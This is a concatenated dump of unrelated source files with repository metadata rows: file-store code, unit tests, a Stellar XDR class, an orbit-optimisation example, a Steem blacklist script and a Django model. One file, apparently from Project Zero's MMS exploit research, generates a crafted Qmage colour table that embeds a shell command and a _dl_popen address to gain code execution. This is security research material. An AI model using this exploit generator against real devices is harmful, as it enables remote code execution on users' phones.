self.jobName)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Consider modifying the user "
"script to avoid the chance of failure due to incorrectly "
"requested resources. " + logString, level=logging.WARNING)
os.chdir(startingDir)
# Finally delete the job from the worker
os.remove(self.jobStateFile)
def writeGlobalFile(self, localFileName, cleanup=False):
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
creatorID = self.jobGraph.jobStoreID
fileStoreID = self.jobStore.writeFile(absLocalFileName, creatorID, cleanup)
if absLocalFileName.startswith(self.localTempDir):
# Only files in the appropriate directory should become local files
# we can delete with deleteLocalFile
self.localFileMap[fileStoreID].append(absLocalFileName)
return FileID.forPath(fileStoreID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
else:
localFilePath = self.getLocalTempFileName()
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
self.localFileMap[fileStoreID].append(localFilePath)
return localFilePath
@contextmanager
def readGlobalFileStream(self, fileStoreID):
with self.jobStore.readFileStream(fileStoreID) as f:
yield f
def exportFile(self, jobStoreFileID, dstUrl):
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def deleteLocalFile(self, fileStoreID):
try:
localFilePaths = self.localFileMap.pop(fileStoreID)
except KeyError:
raise OSError(errno.ENOENT, "Attempting to delete local copies of a file with none")
else:
for localFilePath in localFilePaths:
os.remove(localFilePath)
def deleteGlobalFile(self, fileStoreID):
try:
self.deleteLocalFile(fileStoreID)
except OSError as e:
if e.errno == errno.ENOENT:
# the file does not exist locally, so no local deletion necessary
pass
else:
raise
self.filesToDelete.add(str(fileStoreID))
def waitForCommit(self):
# there is no asynchronicity in this file store so no need to block at all
return True
def startCommit(self, jobState=False):
# Make sure the previous job is committed, if any
if self.waitForPreviousCommit is not None:
self.waitForPreviousCommit()
if not jobState:
# All our operations that need committing are job state related
return
try:
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
def __del__(self):
"""
Cleanup function that is run when destroying the class instance. Nothing to do since there
are no async write events.
"""
pass
@classmethod
def _removeDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
Look at the state of all jobs registered in the individual job state files, and handle them
(clean up the disk)
:param str nodeInfo: The location of the workflow directory on the node.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
:return:
"""
for jobState in cls._getAllJobStates(nodeInfo):
if not process_name_exists(nodeInfo, jobState['jobProcessName']):
# We need to have a race to pick someone to clean up.
try:
# Open the directory
dirFD = os.open(jobState['jobDir'], os.O_RDONLY)
except FileNotFoundError:
# The cleanup has happened and we can't contest for it
continue
try:
# Try and lock it
fcntl.lockf(dirFD, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError as e:
# We lost the race. Someone else is alive and has it locked.
os.close(dirFD)
else:
# We got it
logger.warning('Detected that job (%s) prematurely terminated. Fixing the '
'state of the job on disk.', jobState['jobName'])
try:
if not batchSystemShutdown:
logger.debug("Deleting the stale working directory.")
# Delete the old work directory if it still exists. Do this only during
# the life of the program and dont' do it during the batch system
# cleanup. Leave that to the batch system cleanup code.
robust_rmtree(jobState['jobDir'])
finally:
fcntl.lockf(dirFD, fcntl.LOCK_UN)
os.close(dirFD)
@staticmethod
def _getAllJobStates(workflowDir):
"""
Generator function that deserializes and yields the job state for every job on the node,
one at a time.
:param str workflowDir: The location of the workflow directory on the node.
:return: dict with keys (jobName, jobProcessName, jobDir)
:rtype: dict
"""
jobStateFiles = []
# Note that the directory tree may contain files whose names are not decodable to Unicode.
# So we need to work in bytes.
# We require that the job state files aren't in any of those directories.
for root, dirs, files in os.walk(workflowDir.encode('utf-8')):
for filename in files:
if filename == '.jobState'.encode('utf-8'):
jobStateFiles.append(os.path.join(root, filename).decode('utf-8'))
for filename in jobStateFiles:
try:
yield NonCachingFileStore._readJobState(filename)
except IOError as e:
if e.errno == 2:
# job finished & deleted its jobState file since the jobState files were discovered
continue
else:
raise
@staticmethod
def _readJobState(jobStateFileName):
with open(jobStateFileName, 'rb') as fH:
state = dill.load(fH)
return state
def _createJobStateFile(self):
"""
Create the job state file for the current job and fill in the required
values.
:return: Path to the job state file
:rtype: str
"""
jobStateFile = os.path.join(self.localTempDir, '.jobState')
jobState = {'jobProcessName': get_process_name(self.workDir),
'jobName': self.jobName,
'jobDir': self.localTempDir}
with open(jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(jobStateFile + '.tmp', jobStateFile)
return jobStateFile
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow directory that will contain all the individual worker directories.
"""
cls._removeDeadJobs(dir_, batchSystemShutdown=True)
| 42.197133
| 106
| 0.613013
|
4a15ce47f0456b3653144090c9651139a3eb0a18
| 1,304
|
py
|
Python
|
mms_exploit/qmg_files/code_exec/generate_color_table.py
|
googleprojectzero/SkCodecFuzzer
|
1ffd5b20121c0d6ae842de0da04d5e4d3df64f5c
|
[
"Apache-2.0"
] | 289
|
2020-05-06T16:25:03.000Z
|
2022-03-07T10:52:23.000Z
|
mms_exploit/qmg_files/code_exec/generate_color_table.py
|
googleprojectzero/SkCodecFuzzer
|
1ffd5b20121c0d6ae842de0da04d5e4d3df64f5c
|
[
"Apache-2.0"
] | 6
|
2020-05-09T02:33:35.000Z
|
2021-01-12T10:40:14.000Z
|
mms_exploit/qmg_files/code_exec/generate_color_table.py
|
googleprojectzero/SkCodecFuzzer
|
1ffd5b20121c0d6ae842de0da04d5e4d3df64f5c
|
[
"Apache-2.0"
] | 71
|
2020-05-06T16:39:46.000Z
|
2022-03-06T12:31:57.000Z
|
import struct
import sys
import zlib
def main(argv):
if len(argv) != 5:
print("Usage: %s <output file> <system command> <libhwui!ReadStreaEndError> <linker64!_dl_popen>" % argv[0])
return
BPP = 4
COLORS = 38
OUTPUT_FILE = argv[1]
COMMAND = bytearray(argv[2], encoding='ascii')
ADDR_ReadStreaEndError = int(argv[3], 16)
ADDR_dl_popen = int(argv[4], 16)
assert(len(COMMAND) < 24)
payload = (COMMAND.ljust(24, b"\x00") + struct.pack("<Q", ADDR_dl_popen)).ljust(COLORS * BPP, b"\xcc")
table = [0] * (COLORS * BPP)
for i in range(COLORS):
table[i + COLORS * 0] = payload[i * BPP + 3]
table[i + COLORS * 1] = payload[i * BPP + 2]
table[i + COLORS * 2] = payload[i * BPP + 1]
table[i + COLORS * 3] = payload[i * BPP + 0]
table = table[:-8] + list(struct.pack("<Q", ADDR_ReadStreaEndError))
for i in reversed(range(1, COLORS)):
table[i + COLORS * 0] -= table[i + COLORS * 0 - 1]
table[i + COLORS * 1] -= table[i + COLORS * 1 - 1]
table[i + COLORS * 2] -= table[i + COLORS * 2 - 1]
table[i + COLORS * 3] -= table[i + COLORS * 3 - 1]
output_data = bytes(map(lambda x: (x & 255), table))
compressed = zlib.compress(output_data)
with open(OUTPUT_FILE, "w+b") as f:
f.write(compressed)
if __name__ == "__main__":
main(sys.argv)
| 28.977778
| 112
| 0.606595
|
4a15ce7b256fb8c4c700ab56321185d37e345a02
| 4,907
|
py
|
Python
|
tests/otus/test_utils.py
|
ReeceHoffmann/virtool
|
f9befad060fe16fa29fb80124e674ac5a9c4f538
|
[
"MIT"
] | null | null | null |
tests/otus/test_utils.py
|
ReeceHoffmann/virtool
|
f9befad060fe16fa29fb80124e674ac5a9c4f538
|
[
"MIT"
] | null | null | null |
tests/otus/test_utils.py
|
ReeceHoffmann/virtool
|
f9befad060fe16fa29fb80124e674ac5a9c4f538
|
[
"MIT"
] | null | null | null |
import pytest
import virtool.otus.utils
from virtool.otus.utils import find_isolate, format_isolate_name
class TestVerify:
def test_pass(self, test_merged_otu):
"""
Test that a valid otu and sequence list results in return value of ``None``.
"""
assert virtool.otus.utils.verify(test_merged_otu) is None
def test_empty_isolate(self, test_merged_otu):
"""
Test that an isolate with no sequences is detected.
"""
test_merged_otu["isolates"][0]["sequences"] = list()
assert virtool.otus.utils.verify(test_merged_otu) == {
"empty_isolate": ["cab8b360"],
"empty_sequence": False,
"empty_otu": False,
"isolate_inconsistency": False,
}
def test_empty_sequence(self, test_merged_otu, snapshot):
"""
Test that a sequence with an empty ``sequence`` field is detected.
"""
test_merged_otu["isolates"][0]["sequences"][0]["sequence"] = ""
assert virtool.otus.utils.verify(test_merged_otu) == snapshot
def test_empty_otu(self, test_merged_otu):
"""
Test that an otu with no isolates is detected.
"""
test_merged_otu["isolates"] = []
assert virtool.otus.utils.verify(test_merged_otu) == {
"empty_isolate": False,
"empty_sequence": False,
"empty_otu": True,
"isolate_inconsistency": False,
}
def test_isolate_inconsistency(self, test_merged_otu, test_sequence):
"""
Test that isolates in a single otu with disparate sequence counts are detected.
"""
test_merged_otu["isolates"].append(
dict(test_merged_otu["isolates"][0], id="foobar")
)
test_merged_otu["isolates"][1]["sequences"] = [
dict(test_sequence, _id="foobar_1"),
dict(test_sequence, _id="foobar_2"),
]
assert virtool.otus.utils.verify(test_merged_otu) == {
"empty_isolate": False,
"empty_sequence": False,
"empty_otu": False,
"isolate_inconsistency": True,
}
def test_merge_otu(test_otu, test_sequence, test_merged_otu):
assert virtool.otus.utils.merge_otu(test_otu, [test_sequence]) == test_merged_otu
def test_split(test_otu, test_sequence, test_merged_otu):
otu, sequences = virtool.otus.utils.split(test_merged_otu)
assert otu == test_otu
assert sequences == [test_sequence]
@pytest.mark.parametrize("exists", [True, False])
def test_find_isolate(exists, test_otu, test_isolate):
new_isolate = {
**test_isolate,
"id": "foobar",
"source_type": "isolate",
"source_name": "b",
}
if exists:
test_otu["isolates"].append(new_isolate)
isolate = find_isolate(test_otu["isolates"], "foobar")
assert isolate == (new_isolate if exists else None)
class TestExtractSequenceIds:
def test_valid(self, test_merged_otu):
sequence_ids = virtool.otus.utils.extract_sequence_ids(test_merged_otu)
assert sequence_ids == ["KX269872"]
def test_missing_isolates(self, test_merged_otu):
del test_merged_otu["isolates"]
with pytest.raises(KeyError) as excinfo:
virtool.otus.utils.extract_sequence_ids(test_merged_otu)
assert "'isolates'" in str(excinfo.value)
def test_empty_isolates(self, test_merged_otu):
test_merged_otu["isolates"] = list()
with pytest.raises(ValueError) as excinfo:
virtool.otus.utils.extract_sequence_ids(test_merged_otu)
assert "Empty isolates list" in str(excinfo.value)
def test_missing_sequences(self, test_merged_otu):
del test_merged_otu["isolates"][0]["sequences"]
with pytest.raises(KeyError) as excinfo:
virtool.otus.utils.extract_sequence_ids(test_merged_otu)
assert "missing sequences field" in str(excinfo.value)
def test_empty_sequences(self, test_merged_otu):
test_merged_otu["isolates"][0]["sequences"] = list()
with pytest.raises(ValueError) as excinfo:
virtool.otus.utils.extract_sequence_ids(test_merged_otu)
assert "Empty sequences list" in str(excinfo.value)
@pytest.mark.parametrize(
"source_type, source_name", [("Isolate", ""), ("Isolate", ""), ("", "8816 - v2")]
)
def test_format_isolate_name(source_type, source_name, test_isolate):
"""
Test that a formatted isolate name is produced for a full ``source_type`` and
``source_name``.
Test that if either of these fields are missing, "Unnamed isolate" is returned.
"""
formatted = format_isolate_name(
{**test_isolate, "source_type": source_type, "source_name": source_name}
)
assert (
formatted == "Isolate 8816 - v2"
if source_type and source_name
else "Unnamed Isolate"
)
| 30.66875
| 87
| 0.647442
|
4a15cef4b96e2b9526035d1c80ae21bf202afd33
| 1,961
|
py
|
Python
|
stellar_sdk/xdr/change_trust_op.py
|
MartinThoma/py-stellar-base
|
07ab28cde7a7040f2262b224f9af8a3416c0e5ab
|
[
"Apache-2.0"
] | 1
|
2021-07-06T01:34:08.000Z
|
2021-07-06T01:34:08.000Z
|
stellar_sdk/xdr/change_trust_op.py
|
MartinThoma/py-stellar-base
|
07ab28cde7a7040f2262b224f9af8a3416c0e5ab
|
[
"Apache-2.0"
] | 36
|
2021-08-23T17:31:52.000Z
|
2022-03-28T01:39:00.000Z
|
stellar_sdk/xdr/change_trust_op.py
|
MartinThoma/py-stellar-base
|
07ab28cde7a7040f2262b224f9af8a3416c0e5ab
|
[
"Apache-2.0"
] | 1
|
2021-07-06T01:33:40.000Z
|
2021-07-06T01:33:40.000Z
|
# This is an automatically generated file.
# DO NOT EDIT or your changes may be overwritten
import base64
from xdrlib import Packer, Unpacker
from .asset import Asset
from .int64 import Int64
__all__ = ["ChangeTrustOp"]
class ChangeTrustOp:
"""
XDR Source Code
----------------------------------------------------------------
struct ChangeTrustOp
{
Asset line;
// if limit is set to 0, deletes the trust line
int64 limit;
};
----------------------------------------------------------------
"""
def __init__(
self,
line: Asset,
limit: Int64,
) -> None:
self.line = line
self.limit = limit
def pack(self, packer: Packer) -> None:
self.line.pack(packer)
self.limit.pack(packer)
@classmethod
def unpack(cls, unpacker: Unpacker) -> "ChangeTrustOp":
line = Asset.unpack(unpacker)
limit = Int64.unpack(unpacker)
return cls(
line=line,
limit=limit,
)
def to_xdr_bytes(self) -> bytes:
packer = Packer()
self.pack(packer)
return packer.get_buffer()
@classmethod
def from_xdr_bytes(cls, xdr: bytes) -> "ChangeTrustOp":
unpacker = Unpacker(xdr)
return cls.unpack(unpacker)
def to_xdr(self) -> str:
xdr_bytes = self.to_xdr_bytes()
return base64.b64encode(xdr_bytes).decode()
@classmethod
def from_xdr(cls, xdr: str) -> "ChangeTrustOp":
xdr_bytes = base64.b64decode(xdr.encode())
return cls.from_xdr_bytes(xdr_bytes)
def __eq__(self, other: object):
if not isinstance(other, self.__class__):
return NotImplemented
return self.line == other.line and self.limit == other.limit
def __str__(self):
out = [
f"line={self.line}",
f"limit={self.limit}",
]
return f"<ChangeTrustOp {[', '.join(out)]}>"
| 25.467532
| 68
| 0.54921
|
4a15cf0811b743c2918c1fcd1f974e91c567141e
| 6,942
|
py
|
Python
|
examples/10_Low_Thrust_Orbit_Transfer.py
|
likping/OpenGoddard
|
0906ee85038de85d7683e19532df62fcd53a9e28
|
[
"MIT"
] | 81
|
2017-03-06T07:38:42.000Z
|
2022-02-02T17:50:34.000Z
|
examples/10_Low_Thrust_Orbit_Transfer.py
|
likping/OpenGoddard
|
0906ee85038de85d7683e19532df62fcd53a9e28
|
[
"MIT"
] | 10
|
2017-05-17T14:07:36.000Z
|
2021-10-17T05:36:28.000Z
|
examples/10_Low_Thrust_Orbit_Transfer.py
|
likping/OpenGoddard
|
0906ee85038de85d7683e19532df62fcd53a9e28
|
[
"MIT"
] | 26
|
2017-05-21T17:29:23.000Z
|
2022-03-30T08:19:58.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2017 Interstellar Technologies Inc. All Rights Reserved.
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
from OpenGoddard.optimize import Problem, Guess, Condition, Dynamics
class Orbiter:
def __init__(self):
self.u_max = 0.01
self.r0 = 1.0
self.vr0 = 0.0
self.vt0 = 1.0
self.rf = 4.0
self.vrf = 0.0
self.vtf = 0.5
self.tf_max = 55
def dynamics(prob, obj, section):
r = prob.states(0, section)
vr = prob.states(1, section)
vt = prob.states(2, section)
ur1 = prob.controls(0, section)
ur2 = prob.controls(1, section)
ut1 = prob.controls(2, section)
ut2 = prob.controls(3, section)
dx = Dynamics(prob, section)
dx[0] = vr
dx[1] = vt**2 / r - 1 / r**2 + (ur1 - ur2)
dx[2] = - vr * vt / r + (ut1 - ut2)
return dx()
def equality(prob, obj):
r = prob.states_all_section(0)
vr = prob.states_all_section(1)
vt = prob.states_all_section(2)
ur1 = prob.controls_all_section(0)
ur2 = prob.controls_all_section(1)
ut1 = prob.controls_all_section(2)
ut2 = prob.controls_all_section(3)
tf = prob.time_final(-1)
result = Condition()
# event condition
result.equal(r[0], obj.r0)
result.equal(vr[0], obj.vr0)
result.equal(vt[0], obj.vt0)
result.equal(r[-1], obj.rf)
result.equal(vr[-1], obj.vrf)
result.equal(vt[-1], obj.vtf)
return result()
def inequality(prob, obj):
r = prob.states_all_section(0)
vr = prob.states_all_section(1)
vt = prob.states_all_section(2)
ur1 = prob.controls_all_section(0)
ur2 = prob.controls_all_section(1)
ut1 = prob.controls_all_section(2)
ut2 = prob.controls_all_section(3)
tf = prob.time_final(-1)
result = Condition()
# lower bounds
result.lower_bound(r, obj.r0)
result.lower_bound(ur1, 0.0)
result.lower_bound(ut1, 0.0)
result.lower_bound(ur2, 0.0)
result.lower_bound(ut2, 0.0)
result.lower_bound(tf, 0.0)
# upper bounds
result.upper_bound(r, obj.rf)
result.upper_bound(ur1, obj.u_max)
result.upper_bound(ut1, obj.u_max)
result.upper_bound(ur2, obj.u_max)
result.upper_bound(ut2, obj.u_max)
result.upper_bound(tf, obj.tf_max)
return result()
def cost(prob, obj):
return 0.0
def running_cost(prob, obj):
ur1 = prob.controls_all_section(0)
ur2 = prob.controls_all_section(1)
ut1 = prob.controls_all_section(2)
ut2 = prob.controls_all_section(3)
return (ur1 + ur2) + (ut1 + ut2)
# ========================
plt.close("all")
plt.ion()
# Program Starting Point
time_init = [0.0, 10.0]
n = [100]
num_states = [3]
num_controls = [4]
max_iteration = 10
flag_savefig = True
savefig_dir = "10_Low_Thrust_Orbit_Transfer/"
# ------------------------
# set OpenGoddard class for algorithm determination
prob = Problem(time_init, n, num_states, num_controls, max_iteration)
obj = Orbiter()
# ========================
# Initial parameter guess
r_init = Guess.linear(prob.time_all_section, obj.r0, obj.rf)
# Guess.plot(prob.time_all_section, r_init, "r", "time", "r")
# if(flag_savefig):plt.savefig(savefig_dir + "guess_r" + savefig_add + ".png")
vr_init = Guess.linear(prob.time_all_section, obj.vr0, obj.vrf)
# Guess.plot(prob.time_all_section, vr_init, "vr", "time", "vr")
# if(flag_savefig):plt.savefig(savefig_dir + "guess_vr" + savefig_add + ".png")
vt_init = Guess.linear(prob.time_all_section, obj.vt0, obj.vtf)
# Guess.plot(prob.time_all_section, theta_init, "vt", "time", "vt")
# if(flag_savefig):plt.savefig(savefig_dir + "guess_vt" + savefig_add + ".png")
ur1_init = Guess.linear(prob.time_all_section, obj.u_max, obj.u_max)
# Guess.plot(prob.time_all_section, ur1_init, "ur1", "time", "ur1")
# if(flag_savefig):plt.savefig(savefig_dir + "guess_ur1" + savefig_add + ".png")
ut1_init = Guess.linear(prob.time_all_section, obj.u_max, obj.u_max)
# Guess.plot(prob.time_all_section, ut1_init, "ut1", "time", "ut1")
# if(flag_savefig):plt.savefig(savefig_dir + "guess_ut1" + savefig_add + ".png")
prob.set_states_all_section(0, r_init)
prob.set_states_all_section(1, vr_init)
prob.set_states_all_section(2, vt_init)
prob.set_controls_all_section(0, ur1_init)
prob.set_controls_all_section(2, ut1_init)
# ========================
# Main Process
# Assign problem to SQP solver
prob.dynamics = [dynamics]
prob.knot_states_smooth = []
prob.cost = cost
prob.running_cost = running_cost
prob.equality = equality
prob.inequality = inequality
def display_func():
tf = prob.time_final(-1)
print("tf: {0:.5f}".format(tf))
prob.solve(obj, display_func, ftol=1e-12)
# ========================
# Post Process
# ------------------------
# Convert parameter vector to variable
r = prob.states_all_section(0)
vr = prob.states_all_section(1)
vt = prob.states_all_section(2)
ur1 = prob.controls_all_section(0)
ur2 = prob.controls_all_section(1)
ut1 = prob.controls_all_section(2)
ut2 = prob.controls_all_section(3)
time = prob.time_update()
# ------------------------
# Visualizetion
plt.figure()
plt.plot(time, r, marker="o", label="r")
for line in prob.time_knots():
plt.axvline(line, color="k", alpha=0.5)
plt.grid()
plt.xlabel("time [-]")
plt.ylabel("r [-]")
plt.legend(loc="best")
if(flag_savefig): plt.savefig(savefig_dir + "r" + ".png")
plt.figure()
plt.plot(time, vr, marker="o", label="vr")
plt.plot(time, vt, marker="o", label="vt")
for line in prob.time_knots():
plt.axvline(line, color="k", alpha=0.5)
plt.grid()
plt.xlabel("time [-]")
plt.ylabel("velocity [-]")
plt.legend(loc="best")
if(flag_savefig): plt.savefig(savefig_dir + "velocity" + ".png")
plt.figure()
plt.plot(time, (ur1 - ur2), marker="o", label="ur")
plt.plot(time, (ut1 - ut2), marker="o", label="ut")
# plt.plot(time, ur1, marker="o", label="ur1")
# plt.plot(time, ur2, marker="o", label="ur2")
# plt.plot(time, ut1, marker="o", label="ut1")
# plt.plot(time, ut2, marker="o", label="ut2")
plt.grid()
plt.xlabel("time [-]")
plt.ylabel("thrust [-]")
# plt.ylim([-0.02, 0.6])
plt.legend(loc="best")
if(flag_savefig): plt.savefig(savefig_dir + "thrust" + ".png")
from scipy import integrate
from scipy import interpolate
theta = integrate.cumtrapz(vt / r, time, initial=0)
theta_f = interpolate.interp1d(time, theta)
r_f = interpolate.interp1d(time, r)
time_fine = np.linspace(time[0], time[-1], 1000)
r_fine = r_f(time_fine)
theta_fine = theta_f(time_fine)
fig = plt.figure()
# plt.plot(r*np.cos(theta), r*np.sin(theta))
plt.plot(r_fine*np.cos(theta_fine), r_fine*np.sin(theta_fine))
ax = fig.add_subplot(111)
circle0 = plt.Circle((0.0, 0.0), 1.0, ls="--", fill=False, fc='none')
circlef = plt.Circle((0.0, 0.0), 4.0, ls="--", fill=False, fc='none')
ax.add_patch(circle0)
ax.add_patch(circlef)
plt.grid()
plt.axis('equal')
plt.ylim((-4.1, 4.1))
if(flag_savefig): plt.savefig(savefig_dir + "trajectry" + ".png")
plt.show()
| 28.45082
| 80
| 0.662489
|
4a15d05c74d2139b6a7e61a330188cea036f9cb4
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/libpasteurize/fixes/fix_fullargspec.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/libpasteurize/fixes/fix_fullargspec.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/libpasteurize/fixes/fix_fullargspec.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/56/56/6e/214e9036b0a5991baf0b89ad2c808bdf23028be45c1829d2f5f0f86fe4
| 96
| 96
| 0.895833
|
4a15d089b5457b8c899b6046bfd0cca4fc320524
| 937
|
py
|
Python
|
tests/e2e/process_thies-lnm/tests.py
|
actris-cloudnet/cloudnet-processing
|
1d1a67df3bad0beb7f8ec455e441ea06e8a32e55
|
[
"MIT"
] | null | null | null |
tests/e2e/process_thies-lnm/tests.py
|
actris-cloudnet/cloudnet-processing
|
1d1a67df3bad0beb7f8ec455e441ea06e8a32e55
|
[
"MIT"
] | null | null | null |
tests/e2e/process_thies-lnm/tests.py
|
actris-cloudnet/cloudnet-processing
|
1d1a67df3bad0beb7f8ec455e441ea06e8a32e55
|
[
"MIT"
] | null | null | null |
from os import path
import netCDF4
import pytest
SCRIPT_PATH = path.dirname(path.realpath(__file__))
class TestProcessing:
@pytest.fixture(autouse=True)
def _fetch_params(self, params):
self.full_path = params["full_path"]
self.nc = netCDF4.Dataset(self.full_path)
yield
self.nc.close()
def test_attributes(self):
assert self.nc.year == "2021"
assert self.nc.month == "09"
assert self.nc.day == "15"
assert self.nc.cloudnet_file_type == "disdrometer"
assert self.nc.Conventions == "CF-1.8"
assert hasattr(self.nc, "pid") is False
assert hasattr(self.nc, "cloudnetpy_version")
assert hasattr(self.nc, "cloudnet_processing_version")
def test_time_is_sorted(self):
time = self.nc.variables["time"][:]
assert len(time) == 120
for ind, t in enumerate(time[:-1]):
assert time[ind + 1] > t
| 29.28125
| 62
| 0.629669
|
4a15d0e75211f01e76c7e3320a29a404e6a5a975
| 4,409
|
py
|
Python
|
sbi_check_blacklist.py
|
haroldham/steembasicincome
|
ce5b78ce35dba9cedad6a44eda4cb332bad53e49
|
[
"MIT"
] | null | null | null |
sbi_check_blacklist.py
|
haroldham/steembasicincome
|
ce5b78ce35dba9cedad6a44eda4cb332bad53e49
|
[
"MIT"
] | null | null | null |
sbi_check_blacklist.py
|
haroldham/steembasicincome
|
ce5b78ce35dba9cedad6a44eda4cb332bad53e49
|
[
"MIT"
] | null | null | null |
from beem import Steem
from beem.nodelist import NodeList
from beem.utils import formatTimeString
from datetime import datetime, timedelta
import requests
import json
import os
import dataset
from steembi.storage import TrxDB, MemberDB, ConfigurationDB, KeysDB, TransactionMemoDB
from steembi.transfer_ops_storage import TransferTrx
from steembi.member import Member
if __name__ == "__main__":
config_file = 'config.json'
if not os.path.isfile(config_file):
raise Exception("config.json is missing!")
else:
with open(config_file) as json_data_file:
config_data = json.load(json_data_file)
accounts = config_data["accounts"]
databaseConnector = config_data["databaseConnector"]
databaseConnector2 = config_data["databaseConnector2"]
other_accounts = config_data["other_accounts"]
mgnt_shares = config_data["mgnt_shares"]
hive_blockchain = config_data["hive_blockchain"]
db2 = dataset.connect(databaseConnector2)
db = dataset.connect(databaseConnector)
transferStorage = TransferTrx(db)
# Create keyStorage
trxStorage = TrxDB(db2)
keyStorage = KeysDB(db2)
memberStorage = MemberDB(db2)
confStorage = ConfigurationDB(db2)
transactionStorage = TransactionMemoDB(db2)
conf_setup = confStorage.get()
last_cycle = conf_setup["last_cycle"]
share_cycle_min = conf_setup["share_cycle_min"]
sp_share_ratio = conf_setup["sp_share_ratio"]
rshares_per_cycle = conf_setup["rshares_per_cycle"]
upvote_multiplier = conf_setup["upvote_multiplier"]
last_paid_post = conf_setup["last_paid_post"]
last_paid_comment = conf_setup["last_paid_comment"]
print("last_cycle: %s - %.2f min" % (
formatTimeString(last_cycle), (datetime.utcnow() - last_cycle).total_seconds() / 60))
if last_cycle is None:
last_cycle = datetime.utcnow() - timedelta(seconds=60 * 145)
confStorage.update({"last_cycle": last_cycle})
elif True: # doing same maintanence
data = trxStorage.get_all_data()
data = sorted(data, key=lambda x: (datetime.utcnow() - x["timestamp"]).total_seconds(), reverse=True)
key_list = []
key = keyStorage.get("steembasicincome", "memo")
if key is not None:
key_list.append(key["wif"])
nodes = NodeList()
try:
nodes.update_nodes()
except:
print("could not update nodes")
stm = Steem(keys=key_list, node=nodes.get_nodes(hive=hive_blockchain))
if True: # check if member are blacklisted
member_accounts = memberStorage.get_all_accounts()
member_data = {}
n_records = 0
share_age_member = {}
for m in member_accounts:
member_data[m] = Member(memberStorage.get(m))
cnt = 0
member_data_list = []
for m in member_data:
cnt += 1
if cnt % 100 == 0:
print("%d/%d" % (cnt, len(member_data)))
if len(member_data_list) > 0:
memberStorage.add_batch(member_data_list)
member_data_list = []
response = ""
cnt2 = 0
while str(response) != '<Response [200]>' and cnt2 < 10:
if hive_blockchain:
response = requests.get("http://blacklist.usehive.com/user/%s" % m)
else:
response = requests.get("http://blacklist.usesteem.com/user/%s" % m)
cnt2 += 1
if "blacklisted" in response.json():
if "steemcleaners" in response.json()["blacklisted"]:
member_data[m]["steemcleaners"] = True
else:
member_data[m]["steemcleaners"] = False
if "buildawhale" in response.json()["blacklisted"]:
member_data[m]["buildawhale"] = True
else:
member_data[m]["buildawhale"] = False
member_data_list.append(member_data[m])
if len(member_data_list) > 0:
memberStorage.add_batch(member_data_list)
member_data_list = []
| 41.990476
| 110
| 0.58993
|
4a15d230b21aadc3f8a0825ca0c2d81e24aa30b0
| 2,096
|
py
|
Python
|
pinax/announcements/models.py
|
craigds/pinax-announcements
|
ceaa4f0fcef25a5928a0cfbbf50c74a9afd263ab
|
[
"MIT"
] | 34
|
2016-03-29T22:09:16.000Z
|
2022-03-22T11:15:23.000Z
|
pinax/announcements/models.py
|
craigds/pinax-announcements
|
ceaa4f0fcef25a5928a0cfbbf50c74a9afd263ab
|
[
"MIT"
] | 33
|
2016-02-20T19:36:40.000Z
|
2021-12-14T15:49:55.000Z
|
pinax/announcements/models.py
|
craigds/pinax-announcements
|
ceaa4f0fcef25a5928a0cfbbf50c74a9afd263ab
|
[
"MIT"
] | 19
|
2016-02-29T18:32:30.000Z
|
2022-03-28T21:15:15.000Z
|
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
class Announcement(models.Model):
"""
A single announcement.
"""
DISMISSAL_NO = 1
DISMISSAL_SESSION = 2
DISMISSAL_PERMANENT = 3
DISMISSAL_CHOICES = [
(DISMISSAL_NO, _("No Dismissals Allowed")),
(DISMISSAL_SESSION, _("Session Only Dismissal")),
(DISMISSAL_PERMANENT, _("Permanent Dismissal Allowed"))
]
title = models.CharField(_("title"), max_length=50)
content = models.TextField(_("content"))
creator = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name=_("creator"),
on_delete=models.CASCADE
)
